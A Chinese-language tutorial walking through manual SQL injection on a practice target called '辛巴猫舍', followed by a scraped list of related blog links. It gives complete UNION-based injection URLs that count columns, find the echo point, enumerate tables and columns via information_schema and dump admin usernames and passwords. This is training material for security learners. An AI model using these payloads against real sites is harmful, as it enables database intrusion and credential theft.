SQL注入靶场:辛巴猫舍
查:有多少行
进去是这样的:直接点击
可以看到:我们的url发生了变化,
id是啥,我们猜测,id是数据库的前面的序号,像这样.
我们输入不同的id,可以得到不同的数据库,那么页面也就不同.
测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容
说明id=3 的时候,数据表内容已经"见底"了
于是我们就知道了这个数据表有四行,包括id=0的初始页面
查:有多少列
使用order by 语句.
我从 1~3查,发现3没有,2有.
那么就证明这个数据表就两个字段
读者可以自行去谷歌应用商店下载hackbar或者类似插件
http://59.63.200.79:8003/?id=1 order by 2
所以,这个数据表,4行2列.
判断回显点
回显点就是数据表中的哪个内容可以在网页中显示.
通常用联合查询. 我们知道,这有两个字段.
所以:
http://59.63.200.79:8003/?id=1 union select 1,2
嗯?没反应,还是显示那个内容
我们通过MySQL演示,发现我们注入的select 1,2都在数据表的最底部
想让它显示出来,两种办法
- 添加错误条件在前面,让它不显示
- 显示限制条件
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,2
http://59.63.200.79:8003/?id=1 union select 1,2 limit 1,1
# 任意一种
于是,有一个2就显露出来了,这个2就是回显点!
查:数据库名称
更换url,使用database(),显示出数据库名称
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database()
数据库的名称是maoshe
查:数据表名称
这段代码的意思是,在information_schema.tables这个数据表中,从table_name 这一列中,查找在table_schema这一列中数据库等于当前数据库名称的各个数据表名.
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()
好,数据表名是admin
查:字段名称
group_concat()这个函数可以显示出所有有关的内容,否则就默认显示出第一行的.
列名肯定不止一个,所以我们要一起显示出来.
其实上面也可以用 group_concat(),自行体会一下
http://59.63.200.79:8003/?id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin' limit 1,100
查:单元格内容
最爱的 username 和password来了.
看一看他们都有些啥
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(username) from admin
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(password) from admin
至此,SQL注入演示完毕.
其实sqlmap更快,但没必要
SQL注入靶场:辛巴猫舍相关推荐
- 通过SQL手工注入拿到管理员密码--辛巴猫舍
通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是 ...
- 关于SQL注入靶场搭建及过关教程
关于SQL注入靶场搭建及过关教程 1.需要环境: 下载安装VMware,在虚拟机上布置虚拟机win7或winXP(个人推荐win7,使用界面与现在的win10界面较为相似,使用起来比较舒适) Win7 ...
- 一次简单的SQL注入靶场练习
一次简单的SQL注入靶场练习 文章目录 一次简单的SQL注入靶场练习 前言 一.靶机下载 二.靶场渗透 1.端口扫描 总结 前言 为了巩固SQL注入以及实战演练的需要,我们来做一次简单的关于SQL注入 ...
- SQL注入靶场 RedTiger通关教程(level1~level10)
Sql注入 介绍 Sql注入指的是通过构建特殊的数据查询语句 作为参数传入Web应用程序,通过数据库执行SQL语句来非法获取数据过程. 其主要原因是开发者/建站商写代码时,对用户提交的数据没有做细致的 ...
- 五分钟制作sql注入靶场
接触安全也快两个月了,学了很多安全的知识,也接触到了渗透测试,前面学习了sql注入和XSS漏洞,听郭老师说可以尝试自己搭建一个靶场,所以开始制作自己靶场! 目录 一.数据库 文件db-creds.in ...
- 开普勒sql注入靶场学习
0x00 靶场搭建 下载地址 https://github.com/admin360bug/PHP 安装方法 导入localhost.sql数据库 修改APP/mysql.class.php 数据库配 ...
- 第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...
- SQl注入靶场sqli——第一关
在浏览器中 使用?id=1'–+ 是可以闭合的但是直接在数据库中查询就不会被闭合,这里估计是网页代码闭合的原因,在数据库中没有代码直接查询语句. 接下来是在闭合中添加语句执行我们想要的命令 使用 or ...
- SQL注入(1)--判断是否存在SQL注入漏洞
什么是SQL注入 不论是学习后端开发/数据库/网络安全,SQL注入安全隐患反复被提起 到底什么是SQL? 维基百科的定义: (1)什么是SQL? SQL是用来操控数据库的语言 (2)举一个例子,现在我 ...
最新文章
- 来宾可以删除服务器文件怎么设置密码,服务器来宾用用户设置密码
- 在quartus 和 ISE 里直接调用modelsim的方法(转)
- Java黑皮书课后题第6章:*6.15(金融应用:打印税表)程序清单3-5给出了计算税款的程序。使用下面的方法体编写一个计算税款的方法。使用这个方法编写程序,打印可征税人从50000到60000间隔
- Java实现身份证号码的验证,JAVA后台验证身份证号码
- win10安装TortoiseGit
- mybatis 映射成多个list_SSM:Mybatis架构与原理
- 比特币市值目前是白银68%
- sqlplus可以连接plsql连接不上_Gee引擎配置微端不更新,连接不上,尝试重新连接的解决方法...
- mysql 下一个月_mysql 取当天、昨天、上一个月、当前月和下个月数据
- 【Axure元件库】彩色圆形图标库 810+个矢量扁平化图标
- <2021SC@SDUSC>开源游戏引擎Overload代码分析五:OvEditor——RawShaders.cpp
- 日企抛等离子淘汰论 专家称其不敌中国企业
- Python如何批量把图片地址输入到浏览器上
- Choco包管理工具安装
- 弘兵金融学院 站在山顶 看不见山
- 好男人都死到哪去了?
- 【软考笔记】1. 计算机原理与体系结构
- 使用 Packer 自动执行 VMware vsphere 模板
- 什么是MyBatis?怎么操作MyBatis?
- 扩充虚拟机文件系统的磁盘空间
热门文章
- 什么时候用C而不用C++?
- mysql dbms是什么_什么是DBMS
- 百万互动出圈爆品复盘,小红书品牌如何高效打造爆品?
- mysql 分数相加_分数求和
- 数据挖掘技术的算法与应用
- 科学探索奖名单揭晓:北大数学「黄金一代」袁新意上榜,首现90后获奖人
- matlab编程勒让德多项式展开例题解析,第19 勒让德多项式 球函数习题及解答
- python发邮件附件_python 发送带附件的邮件
- 明日之后如何注销一个服务器的账号,明日之后账号怎么注销_明日之后账号注销方法介绍_玩游戏网...
- 总结下macbook 安装win10 双系统丢驱动的问题